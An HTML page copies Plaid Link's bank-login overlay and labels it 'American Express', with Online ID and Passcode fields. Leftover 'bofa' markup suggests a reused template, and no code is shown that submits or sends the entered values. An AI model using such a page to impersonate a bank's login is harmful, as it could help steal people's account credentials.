<html class=" js rgba cssanimations csscolumns cssgradients cssreflections csstransforms csstransforms3d csstransitions generatedcontent" style="">
		<head>
				<base target="_blank">
				<meta charset="utf-8">
				<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
				<link rel="stylesheet" href="https://cdn.plaid.com/link/0.2.3/link.css">
				<style type = 'text/css'>
					.centerx
					{
						position:absolute; left:50%; 
						transform:translateX(-50%);
						-moz-transform:translateX(-50%);
						-ms-transform:translateX(-50%);
						-webkit-transform:translateX(-50%);
						-o-transform:translateX(-50%);
					}
				</style>
				<script src="https://cdn.plaid.com/link/0.2.3/link.js"></script>
				 <script type="text/javascript" src="https://cdn.plaid.com/js/modernizr.custom.js"></script>

				
		</head>
		<body class="" >
			 
				
				<div class="overlay-view active" id="overlay-container" style = 'display:'>
					<div class="link-view" id="link-view">
						<div id="plaid-link-container" class="credentials-pane">
							<div data-reactid=".0">
								<div class="a-form credentials-component" data-institution="bofa" style="padding-top:38px;" data-reactid=".0.0">
										
										
										<div class="header" data-reactid=".0.0.2">
												<div class="exit-button" data-reactid=".0.0.2.0">×</div>
												<div align = 'center' style = 'color:red; font-size:20px; padding-top:50px'>American Express</div>
										</div>
										<div class="credentials-form" data-reactid=".0.0.3" style = 'margin-top:100px'>
												<div style="position:relative;" class=" " data-reactid=".0.0.3.1:$username"><label for="username" data-reactid=".0.0.3.1:$username.0">Online ID</label><input aria-required="true" autocapitalize="off" autocomplete="off" autocorrect="off" id="amexusername" name="username" placeholder="Online ID" spellcheck="off" type="text" data-reactid=".0.0.3.1:$username.1"></div>
												<div style="position:relative;" class=" " data-reactid=".0.0.3.1:$password"><label for="password" data-reactid=".0.0.3.1:$password.0">Passcode</label><input aria-required="true" autocapitalize="off" autocomplete="off" autocorrect="off" id="amexpassword" name="password" placeholder="Passcode" spellcheck="off" type="password" data-reactid=".0.0.3.1:$password.1"></div>
										
												<input type="submit" value="Submit" class="button submit-button sans-back-button centerx" data-reactid=".0.0.3.2.0" style = 'centerx'>
												<div style="clear:both;" data-reactid=".0.0.3.2.2"></div>
												
										</div>
										
								</div>
									
							</div>
						</div>
					</div>
				</div>        
				 
		</body>
</html>